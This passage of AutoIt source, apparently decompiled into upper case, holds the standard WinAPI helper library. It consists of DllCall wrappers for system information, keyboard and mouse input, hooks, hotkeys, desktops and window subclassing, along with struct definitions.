$HDEVICE , "uint" , $IFLAG , "struct*" , $PBUFFER , "uint*" , $ILENGTH ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) IF $ARET [0 ] = 0xFFFFFFFF THEN RETURN SETERROR (10 , + 4294967295 , 0 ) RETURN ($ARET [3 ] $ARET [0 ] $ARET [4 ] ) ENDFUNC FUNC _WINAPI_GETREGISTEREDRAWINPUTDEVICES ($PBUFFER , $ILENGTH ) LOCAL $ILENGTHRAW = DLLSTRUCTGETSIZE (DLLSTRUCTCREATE ($TAGRAWINPUTDEVICE ) ) LOCAL $ARET = DLLCALL ("user32.dll" , "uint" , "GetRegisteredRawInputDevices" , "struct*" , $PBUFFER , "uint*" , FLOOR ($ILENGTH / $ILENGTHRAW ) , "uint" , $ILENGTHRAW ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) IF $ARET [0 ] = 0xFFFFFFFF THEN LOCAL $ILASTERROR = _WINAPI_GETLASTERROR () IF $ILASTERROR = 122 THEN RETURN SETEXTENDED ($ILASTERROR , $ARET [2 ] * $ILENGTHRAW ) RETURN SETERROR (10 , $ILASTERROR , 0 ) ENDIF RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_GETSTARTUPINFO () LOCAL $TSI = DLLSTRUCTCREATE ($TAGSTARTUPINFO ) DLLCALL ("kernel32.dll" , "none" , "GetStartupInfoW" , "struct*" , $TSI ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $TSI ENDFUNC FUNC _WINAPI_GETSYSTEMDEPPOLICY () LOCAL $ARET = DLLCALL ("kernel32.dll" , "uint" , "GetSystemDEPPolicy" ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , + 4294967295 ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_GETSYSTEMINFO () LOCAL $SPROC IF _WINAPI_ISWOW64PROCESS () THEN $SPROC = "GetNativeSystemInfo" ELSE $SPROC = "GetSystemInfo" ENDIF LOCAL CONST $TAGSYSTEMINFO = "struct;word ProcessorArchitecture;word Reserved; endstruct;dword PageSize;" & "ptr MinimumApplicationAddress;ptr MaximumApplicationAddress;dword_ptr ActiveProcessorMask;dword NumberOfProcessors;" & "dword ProcessorType;dword AllocationGranularity;word ProcessorLevel;word ProcessorRevision" LOCAL $TSYSTEMINFO = DLLSTRUCTCREATE ($TAGSYSTEMINFO ) DLLCALL ("kernel32.dll" , "none" , $SPROC , "struct*" , $TSYSTEMINFO ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) LOCAL $ARESULT [10 ] $ARESULT [0 ] = DLLSTRUCTGETDATA ($TSYSTEMINFO , 1 ) FOR $I = 1 TO 9 $ARESULT [$I ] = DLLSTRUCTGETDATA ($TSYSTEMINFO , $I + 2 ) NEXT RETURN $ARESULT ENDFUNC FUNC _WINAPI_GETSYSTEMPOWERSTATUS () LOCAL $TAGSYSTEM_POWER_STATUS = "byte ACLineStatus;byte BatteryFlag;byte BatteryLifePercent;byte Reserved1;" & "int BatteryLifeTime;int BatteryFullLifeTime" LOCAL $TSYSTEM_POWER_STATUS = DLLSTRUCTCREATE ($TAGSYSTEM_POWER_STATUS ) LOCAL $ARET = DLLCALL ("kernel32.dll" , "bool" , "GetSystemPowerStatus" , "struct*" , $TSYSTEM_POWER_STATUS ) IF @ERROR OR NOT $ARET [0 ] THEN RETURN SETERROR (@ERROR + 10 , @EXTENDED , 0 ) LOCAL $ARESULT [5 ] $ARESULT [0 ] = DLLSTRUCTGETDATA ($TSYSTEM_POWER_STATUS , 1 ) $ARESULT [1 ] = DLLSTRUCTGETDATA ($TSYSTEM_POWER_STATUS , 2 ) $ARESULT [2 ] = DLLSTRUCTGETDATA ($TSYSTEM_POWER_STATUS , 3 ) $ARESULT [3 ] = DLLSTRUCTGETDATA ($TSYSTEM_POWER_STATUS , 5 ) $ARESULT [4 ] = DLLSTRUCTGETDATA ($TSYSTEM_POWER_STATUS , 6 ) RETURN $ARESULT ENDFUNC FUNC _WINAPI_GETSYSTEMTIMES () LOCAL $ARET = DLLCALL ("kernel32.dll" , "bool" , "GetSystemTimes" , "uint64*" , 0 , "uint64*" , 0 , "uint64*" , 0 ) IF @ERROR OR NOT $ARET [0 ] THEN RETURN SETERROR (@ERROR + 10 , @EXTENDED , 0 ) LOCAL $ARESULT [3 ] FOR $I = 0 TO 2 $ARESULT [$I ] = $ARET [$I + 1 ] NEXT RETURN $ARESULT ENDFUNC FUNC _WINAPI_GETSYSTEMWOW64DIRECTORY () LOCAL $ARET = DLLCALL ("kernel32.dll" , "uint" , "GetSystemWow64DirectoryW" , "wstr" , "" , "uint" , 4096 ) IF @ERROR OR NOT $ARET [0 ] THEN RETURN SETERROR (@ERROR + 10 , _WINAPI_GETLASTERROR () , "" ) RETURN $ARET [1 ] ENDFUNC FUNC _WINAPI_GETTICKCOUNT () LOCAL $ARET = DLLCALL ("kernel32.dll" , "dword" , "GetTickCount" ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_GETTICKCOUNT64 () LOCAL $ARET = DLLCALL ("kernel32.dll" , "uint64" , "GetTickCount64" ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_GETUSEROBJECTINFORMATION ($HOBJECT , $IINDEX ) LOCAL $ARET = DLLCALL ("user32.dll" , "bool" , "GetUserObjectInformationW" , "handle" , $HOBJECT , "int" , $IINDEX , "ptr" , 0 , "dword" , 0 , "dword*" , 0 ) IF @ERROR OR NOT $ARET [5 ] THEN RETURN SETERROR (@ERROR + 10 , @EXTENDED , 0 ) LOCAL $TDATA SWITCH $IINDEX CASE 1 $TDATA = DLLSTRUCTCREATE ($TAGUSEROBJECTFLAGS ) CASE 5 , 6 $TDATA = DLLSTRUCTCREATE ("uint" ) CASE 2 , 3 $TDATA = DLLSTRUCTCREATE ("wchar[" & $ARET [5 ] & "]" ) CASE 4 $TDATA = DLLSTRUCTCREATE ("byte[" & $ARET [5 ] & "]" ) CASE ELSE RETURN SETERROR (20 , 0 , 0 ) ENDSWITCH $ARET = DLLCALL ("user32.dll" , "bool" , "GetUserObjectInformationW" , "handle" , $HOBJECT , "int" , $IINDEX , "struct*" , $TDATA , "dword" , DLLSTRUCTGETSIZE ($TDATA ) , "dword*" , 0 ) IF @ERROR OR NOT $ARET [0 ] THEN RETURN SETERROR (@ERROR + 30 , @EXTENDED , 0 ) SWITCH $IINDEX CASE 1 , 4 RETURN $TDATA CASE ELSE RETURN DLLSTRUCTGETDATA ($TDATA , 1 ) ENDSWITCH ENDFUNC FUNC _WINAPI_GETVERSION () RETURN NUMBER (BITAND (BITSHIFT ($__WINVER , 8 ) , 255 ) & "." & BITAND ($__WINVER , 255 ) , $NUMBER_DOUBLE ) ENDFUNC FUNC _WINAPI_GETVERSIONEX () LOCAL $TOSVERSIONINFOEX = DLLSTRUCTCREATE ($TAGOSVERSIONINFOEX ) DLLSTRUCTSETDATA ($TOSVERSIONINFOEX , "OSVersionInfoSize" , DLLSTRUCTGETSIZE ($TOSVERSIONINFOEX ) ) LOCAL $ARET = DLLCALL ("kernel32.dll" , "bool" , "GetVersionExW" , "struct*" , $TOSVERSIONINFOEX ) IF @ERROR OR NOT $ARET [0 ] THEN RETURN SETERROR (@ERROR + 10 , @EXTENDED , 0 ) RETURN $TOSVERSIONINFOEX ENDFUNC FUNC _WINAPI_GETWORKAREA () LOCAL $TRECT = DLLSTRUCTCREATE ($TAGRECT ) LOCAL $ARET = DLLCALL ("user32.dll" , "int" , "SystemParametersInfo" , "uint" , 48 , "uint" , 0 , "struct*" , $TRECT , "uint" , 0 ) IF @ERROR OR NOT $ARET [0 ] THEN RETURN SETERROR (@ERROR + 10 , @EXTENDED , 0 ) RETURN $TRECT ENDFUNC FUNC _WINAPI_INITMUILANGUAGE ($ILANGUAGE ) DLLCALL ("comctl32.dll" , "none" , "InitMUILanguage" , "word" , $ILANGUAGE ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN 1 ENDFUNC FUNC _WINAPI_ISLOADKBLAYOUT ($ILANGUAGE ) LOCAL $ALAYOUT = _WINAPI_GETKEYBOARDLAYOUTLIST () IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) FOR $I = 1 TO $ALAYOUT [0 ] IF $ALAYOUT [$I ] = $ILANGUAGE THEN RETURN TRUE NEXT RETURN FALSE ENDFUNC FUNC _WINAPI_ISPROCESSORFEATUREPRESENT ($IFEATURE ) LOCAL $ARET = DLLCALL ("kernel32.dll" , "bool" , "IsProcessorFeaturePresent" , "dword" , $IFEATURE ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_ISWINDOWENABLED ($HWND ) LOCAL $ARET = DLLCALL ("user32.dll" , "bool" , "IsWindowEnabled" , "hwnd" , $HWND ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_KEYBD_EVENT ($VKEY , $IFLAGS , $ISCANCODE = 0 , $IEXTRAINFO = 0 ) DLLCALL ("user32.dll" , "none" , "keybd_event" , "byte" , $VKEY , "byte" , $ISCANCODE , "dword" , $IFLAGS , "ulong_ptr" , $IEXTRAINFO ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN 1 ENDFUNC FUNC _WINAPI_LOADKEYBOARDLAYOUT ($ILANGUAGE , $IFLAG = 0 ) LOCAL $ARET = DLLCALL ("user32.dll" , "handle" , "LoadKeyboardLayoutW" , "wstr" , HEX ($ILANGUAGE , 8 ) , "uint" , $IFLAG ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_LOCKWORKSTATION () LOCAL $ARET = DLLCALL ("user32.dll" , "bool" , "LockWorkStation" ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_MAPVIRTUALKEY ($ICODE , $ITYPE , $HLOCALE = 0 ) LOCAL $ARET = DLLCALL ("user32.dll" , "INT" , "MapVirtualKeyExW" , "uint" , $ICODE , "uint" , $ITYPE , "uint_ptr" , $HLOCALE ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_MOUSE_EVENT ($IFLAGS , $IX = 0 , $IY = 0 , $IDATA = 0 , $IEXTRAINFO = 0 ) DLLCALL ("user32.dll" , "none" , "mouse_event" , "dword" , $IFLAGS , "dword" , $IX , "dword" , $IY , "dword" , $IDATA , "ulong_ptr" , $IEXTRAINFO ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED ) ENDFUNC FUNC _WINAPI_OPENDESKTOP ($SNAME , $IACCESS = 0 , $IFLAGS = 0 , $BINHERIT = FALSE ) LOCAL $ARET = DLLCALL ("user32.dll" , "handle" , "OpenDesktopW" , "wstr" , $SNAME , "dword" , $IFLAGS , "bool" , $BINHERIT , "dword" , $IACCESS ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_OPENINPUTDESKTOP ($IACCESS = 0 , $IFLAGS = 0 , $BINHERIT = FALSE ) LOCAL $ARET = DLLCALL ("user32.dll" , "handle" , "OpenInputDesktop" , "dword" , $IFLAGS , "bool" , $BINHERIT , "dword" , $IACCESS ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_OPENWINDOWSTATION ($SNAME , $IACCESS = 0 , $BINHERIT = FALSE ) LOCAL $ARET = DLLCALL ("user32.dll" , "handle" , "OpenWindowStationW" , "wstr" , $SNAME , "bool" , $BINHERIT , "dword" , $IACCESS ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_QUERYPERFORMANCECOUNTER () LOCAL $ARET = DLLCALL ("kernel32.dll" , "bool" , "QueryPerformanceCounter" , "int64*" , 0 ) IF @ERROR OR NOT $ARET [0 ] THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARET [1 ] ENDFUNC FUNC _WINAPI_QUERYPERFORMANCEFREQUENCY () LOCAL $ARET = DLLCALL ("kernel32.dll" , "bool" , "QueryPerformanceFrequency" , "int64*" , 0 ) IF @ERROR OR NOT $ARET [0 ] THEN RETURN SETERROR (@ERROR + 10 , @EXTENDED , 0 ) RETURN $ARET [1 ] ENDFUNC FUNC _WINAPI_REGISTERHOTKEY ($HWND , $IID , $IMODIFIERS , $VKEY ) LOCAL $ARET = DLLCALL ("user32.dll" , "bool" , "RegisterHotKey" , "hwnd" , $HWND , "int" , $IID , "uint" , $IMODIFIERS , "uint" , $VKEY ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_REGISTERPOWERSETTINGNOTIFICATION ($HWND , $SGUID ) LOCAL $TGUID = DLLSTRUCTCREATE ($TAGGUID ) LOCAL $ARET = DLLCALL ("ole32.dll" , "long" , "CLSIDFromString" , "wstr" , $SGUID , "struct*" , $TGUID ) IF @ERROR OR $ARET [0 ] THEN RETURN SETERROR (@ERROR + 20 , @EXTENDED , 0 ) $ARET = DLLCALL ("user32.dll" , "handle" , "RegisterPowerSettingNotification" , "handle" , $HWND , "struct*" , $TGUID , "dword" , 0 ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_REGISTERRAWINPUTDEVICES ($PADEVICE , $ICOUNT = 1 ) LOCAL $ARET = DLLCALL ("user32.dll" , "bool" , "RegisterRawInputDevices" , "struct*" , $PADEVICE , "uint" , $ICOUNT , "uint" , DLLSTRUCTGETSIZE (DLLSTRUCTCREATE ($TAGRAWINPUTDEVICE ) ) * $ICOUNT ) IF @ERROR OR NOT $ARET [0 ] THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_RELEASECAPTURE () LOCAL $ARESULT = DLLCALL ("user32.dll" , "bool" , "ReleaseCapture" ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_REMOVECLIPBOARDFORMATLISTENER ($HWND ) LOCAL $ARET = DLLCALL ("user32.dll" , "bool" , "RemoveClipboardFormatListener" , "hwnd" , $HWND ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_SETACTIVEWINDOW ($HWND ) LOCAL $ARET = DLLCALL ("user32.dll" , "int" , "SetActiveWindow" , "hwnd" , $HWND ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_SETCAPTURE ($HWND ) LOCAL $ARESULT = DLLCALL ("user32.dll" , "hwnd" , "SetCapture" , "hwnd" , $HWND ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_SETDEFAULTPRINTER ($SPRINTER ) LOCAL $ARESULT = DLLCALL ("winspool.drv" , "bool" , "SetDefaultPrinterW" , "wstr" , $SPRINTER ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_SETDLLDIRECTORY ($SDIRPATH = DEFAULT ) LOCAL $STYPEOFPATH = "wstr" IF $SDIRPATH = DEFAULT THEN $STYPEOFPATH = "ptr" $SDIRPATH = 0 ENDIF LOCAL $ARET = DLLCALL ("kernel32.dll" , "bool" , "SetDllDirectoryW" , $STYPEOFPATH , $SDIRPATH ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_SETKEYBOARDLAYOUT ($HWND , $ILANGUAGE , $IFLAGS = 0 ) IF NOT _WINAPI_ISWINDOW ($HWND ) THEN RETURN SETERROR (@ERROR + 10 , @EXTENDED , 0 ) LOCAL $HLOCALE = 0 IF $ILANGUAGE THEN $HLOCALE = _WINAPI_LOADKEYBOARDLAYOUT ($ILANGUAGE ) IF NOT $HLOCALE THEN RETURN SETERROR (10 , 0 , 0 ) ENDIF LOCAL CONST $WM_INPUTLANGCHANGEREQUEST = 80 DLLCALL ("user32.dll" , "none" , "SendMessage" , "hwnd" , $HWND , "uint" , $WM_INPUTLANGCHANGEREQUEST , "uint" , $IFLAGS , "uint_ptr" , $HLOCALE ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN 1 ENDFUNC FUNC _WINAPI_SETKEYBOARDSTATE (BYREF $TSTATE ) LOCAL $ARET = DLLCALL ("user32.dll" , "int" , "SetKeyboardState" , "struct*" , $TSTATE ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_SETPROCESSSHUTDOWNPARAMETERS ($ILEVEL , $BDIALOG = FALSE ) LOCAL $ARET = DLLCALL ("kernel32.dll" , "bool" , "SetProcessShutdownParameters" , "dword" , $ILEVEL , "dword" , NOT $BDIALOG ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_SETPROCESSWINDOWSTATION ($HSTATION ) LOCAL $ARET = DLLCALL ("user32.dll" , "bool" , "SetProcessWindowStation" , "handle" , $HSTATION ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_SETUSEROBJECTINFORMATION ($HOBJECT , $IINDEX , BYREF $TDATA ) IF $IINDEX <> 1 THEN RETURN SETERROR (10 , 0 , FALSE ) LOCAL $ARET = DLLCALL ("user32.dll" , "bool" , "SetUserObjectInformationW" , "handle" , $HOBJECT , "int" , 1 , "struct*" , $TDATA , "dword" , DLLSTRUCTGETSIZE ($TDATA ) ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_SETWINDOWSHOOKEX ($IHOOK , $PPROC , $HDLL , $ITHREADID = 0 ) LOCAL $ARESULT = DLLCALL ("user32.dll" , "handle" , "SetWindowsHookEx" , "int" , $IHOOK , "ptr" , $PPROC , "handle" , $HDLL , "dword" , $ITHREADID ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_SETWINEVENTHOOK ($IEVENTMIN , $IEVENTMAX , $PEVENTPROC , $IPID = 0 , $ITHREADID = 0 , $IFLAGS = 0 ) LOCAL $ARET = DLLCALL ("user32.dll" , "handle" , "SetWinEventHook" , "uint" , $IEVENTMIN , "uint" , $IEVENTMAX , "ptr" , 0 , "ptr" , $PEVENTPROC , "dword" , $IPID , "dword" , $ITHREADID , "uint" , $IFLAGS ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_SHUTDOWNBLOCKREASONCREATE ($HWND , $STEXT ) LOCAL $ARET = DLLCALL ("user32.dll" , "bool" , "ShutdownBlockReasonCreate" , "hwnd" , $HWND , "wstr" , $STEXT ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_SHUTDOWNBLOCKREASONDESTROY ($HWND ) LOCAL $ARET = DLLCALL ("user32.dll" , "bool" , "ShutdownBlockReasonDestroy" , "hwnd" , $HWND ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_SHUTDOWNBLOCKREASONQUERY ($HWND ) LOCAL $ARET = DLLCALL ("user32.dll" , "bool" , "ShutdownBlockReasonQuery" , "hwnd" , $HWND , "wstr" , "" , "dword*" , 4096 ) IF @ERROR OR NOT $ARET [0 ] THEN RETURN SETERROR (@ERROR + 10 , @EXTENDED , "" ) RETURN $ARET [2 ] ENDFUNC FUNC _WINAPI_SWITCHDESKTOP ($HDESKTOP ) LOCAL $ARET = DLLCALL ("user32.dll" , "bool" , "SwitchDesktop" , "handle" , $HDESKTOP ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_SYSTEMPARAMETERSINFO ($IACTION , $IPARAM = 0 , $VPARAM = 0 , $IWININI = 0 ) LOCAL $ARESULT = DLLCALL ("user32.dll" , "bool" , "SystemParametersInfoW" , "uint" , $IACTION , "uint" , $IPARAM , "struct*" , $VPARAM , "uint" , $IWININI ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_TRACKMOUSEEVENT ($HWND , $IFLAGS , $ITIME = + 4294967295 ) LOCAL $TTME = DLLSTRUCTCREATE ("dword;dword;hwnd;dword" ) DLLSTRUCTSETDATA ($TTME , 1 , DLLSTRUCTGETSIZE ($TTME ) ) DLLSTRUCTSETDATA ($TTME , 2 , $IFLAGS ) DLLSTRUCTSETDATA ($TTME , 3 , $HWND ) DLLSTRUCTSETDATA ($TTME , 4 , $ITIME ) LOCAL $ARET = DLLCALL ("user32.dll" , "bool" , "TrackMouseEvent" , "struct*" , $TTME ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_UNHOOKWINDOWSHOOKEX ($HHOOK ) LOCAL $ARESULT = DLLCALL ("user32.dll" , "bool" , "UnhookWindowsHookEx" , "handle" , $HHOOK ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_UNHOOKWINEVENT ($HEVENTHOOK ) LOCAL $ARET = DLLCALL ("user32.dll" , "bool" , "UnhookWinEvent" , "handle" , $HEVENTHOOK ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_UNLOADKEYBOARDLAYOUT ($HLOCALE ) LOCAL $ARET = DLLCALL ("user32.dll" , "bool" , "UnloadKeyboardLayout" , "handle" , $HLOCALE ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_UNREGISTERHOTKEY ($HWND , $IID ) LOCAL $ARET = DLLCALL ("user32.dll" , "bool" , "UnregisterHotKey" , "hwnd" , $HWND , "int" , $IID ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_UNREGISTERPOWERSETTINGNOTIFICATION ($HNOTIFY ) LOCAL $ARET = DLLCALL ("user32.dll" , "bool" , "UnregisterPowerSettingNotification" , "handle" , $HNOTIFY ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARET [0 ] ENDFUNC FUNC __ENUMPAGEFILESPROC ($ISIZE , $PINFO , $PFILE ) LOCAL $TEPFI = DLLSTRUCTCREATE ("dword;dword;ulong_ptr;ulong_ptr;ulong_ptr" , $PINFO ) __INC ($__G_VENUM ) $__G_VENUM [$__G_VENUM [0 ] [0 ] ] [0 ] = DLLSTRUCTGETDATA (DLLSTRUCTCREATE ("wchar[" & (_WINAPI_STRLEN ($PFILE ) + 1 ) & "]" , $PFILE ) , 1 ) FOR $I = 1 TO 3 $__G_VENUM [$__G_VENUM [0 ] [0 ] ] [$I ] = DLLSTRUCTGETDATA ($TEPFI , $I + 2 ) * $ISIZE NEXT RETURN 1 ENDFUNC #EndRegion Internal Functions #Region Global Variables and Constants GLOBAL CONST $TAGNOTIFYICONDATA = "struct;dword Size;hwnd hWnd;uint ID;uint Flags;uint CallbackMessage;ptr hIcon;wchar Tip[128];dword State;dword StateMask;wchar Info[256];uint Version;wchar InfoTitle[64];dword InfoFlags;endstruct" GLOBAL CONST $TAGNOTIFYICONDATA_V3 = $TAGNOTIFYICONDATA & ";" & $TAGGUID GLOBAL CONST $TAGNOTIFYICONDATA_V4 = $TAGNOTIFYICONDATA_V3 & ";ptr hBalloonIcon;" GLOBAL CONST $TAGSHELLEXECUTEINFO = "dword Size;ulong Mask;hwnd hWnd;ptr Verb;ptr File;ptr Parameters;ptr Directory;int Show;ulong_ptr hInstApp;ptr IDList;ptr Class;ulong_ptr hKeyClass;dword HotKey;ptr hMonitor;ptr hProcess" GLOBAL CONST $TAGSHFILEINFO = "ptr hIcon;int iIcon;dword Attributes;wchar DisplayName[260];wchar TypeName[80]" GLOBAL CONST $TAGSHFILEOPSTRUCT = "hwnd hWnd;uint Func;ptr From;ptr To;dword Flags;int fAnyOperationsAborted;ptr hNameMappings;ptr ProgressTitle" GLOBAL CONST $TAGSHFOLDERCUSTOMSETTINGS = "dword Size;dword Mask;ptr GUID;ptr WebViewTemplate;dword SizeWVT;ptr WebViewTemplateVersion;ptr InfoTip;dword SizeIT;ptr CLSID;dword Flags;ptr IconFile;dword SizeIF;int IconIndex;ptr Logo;dword SizeL" GLOBAL CONST $TAGSHSTOCKICONINFO = "dword Size;ptr hIcon;int SysImageIndex;int iIcon;wchar Path[260]" #EndRegion Global Variables and Constants #Region Functions list #EndRegion Functions list #Region Public Functions FUNC _WINAPI_DEFSUBCLASSPROC ($HWND , $IMSG , $WPARAM , $LPARAM ) LOCAL $ARET = DLLCALL ("comctl32.dll" , "lresult" , "DefSubclassProc" , "hwnd" , $HWND , "uint" , $IMSG , "wparam" , $WPARAM , "lparam" , $LPARAM ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_DLLGETVERSION ($SFILEPATH ) LOCAL $TVERSION = DLLSTRUCTCREATE ("dword[5]" ) DLLSTRUCTSETDATA ($TVERSION , 1 , DLLSTRUCTGETSIZE ($TVERSION ) , 1 ) LOCAL $ARET = DLLCALL ($SFILEPATH , "uint" , "DllGetVersion" , "struct*" , $TVERSION ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) IF $ARET [0 ] THEN RETURN SETERROR (10 , $ARET [0 ] , 0 ) LOCAL $ARESULT [4 ] FOR $I = 0 TO 3 $ARESULT [$I ] = DLLSTRUCTGETDATA ($TVERSION , 1 , $I + 2 ) NEXT RETURN $ARESULT ENDFUNC FUNC _WINAPI_FINDEXECUTABLE ($SFILENAME , $SDIRECTORY = "" ) LOCAL $ARESULT = DLLCALL ("shell32.dll" , "INT" , "FindExecutableW" , "wstr" , $SFILENAME , "wstr" , $SDIRECTORY , "wstr" , "" ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , "" ) IF $ARESULT [0 ] <= 32 THEN RETURN SETERROR (10 , $ARESULT [0 ] , "" ) RETURN SETEXTENDED ($ARESULT [0 ] , $ARESULT [3 ] ) ENDFUNC FUNC _WINAPI_GETALLUSERSPROFILEDIRECTORY () LOCAL $ARET = DLLCALL ("userenv.dll" , "bool" , "GetAllUsersProfileDirectoryW" , "wstr" , "" , "dword*" , 4096 ) IF @ERROR OR NOT $ARET [0 ] THEN RETURN SETERROR (@ERROR , @EXTENDED , "" ) RETURN $ARET [1 ] ENDFUNC FUNC _WINAPI_GETDEFAULTUSERPROFILEDIRECTORY () LOCAL $ARET = DLLCALL ("userenv.dll" , "bool" , "GetDefaultUserProfileDirectoryW" , "wstr" , "" , "dword*" , 4096 ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , "" ) RETURN $ARET [1 ] ENDFUNC FUNC _WINAPI_GETWINDOWSUBCLASS ($HWND , $PSUBCLASSPROC , $IDSUBCLASS ) LOCAL $ARET = DLLCALL ("comctl32.dll" , "bool" , "GetWindowSubclass" , "hwnd" , $HWND , "ptr" , $PSUBCLASSPROC , "uint_ptr" , $IDSUBCLASS , "dword_ptr*" , 0 ) IF @ERROR OR NOT $ARET [0 ] THEN RETURN SETERROR (@ERROR + 10 , @EXTENDED , 0 ) RETURN $ARET [4 ] ENDFUNC FUNC _WINAPI_REMOVEWINDOWSUBCLASS ($HWND , $PSUBCLASSPROC , $IDSUBCLASS ) LOCAL $ARET = DLLCALL ("comctl32.dll" , "bool" , "RemoveWindowSubclass" , "hwnd" , $HWND , "ptr" , $PSUBCLASSPROC , "uint_ptr" , $IDSUBCLASS ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_SETCURRENTPROCESSEXPLICITAPPUSERMODELID ($SAPPID ) LOCAL $ARET = DLLCALL ("shell32.dll" , "long" , "SetCurrentProcessExplicitAppUserModelID" , "wstr" , $SAPPID ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) IF $ARET [0 ] THEN RETURN SETERROR (10 , $ARET [0 ] , 0 ) RETURN 1 ENDFUNC FUNC _WINAPI_SETWINDOWSUBCLASS 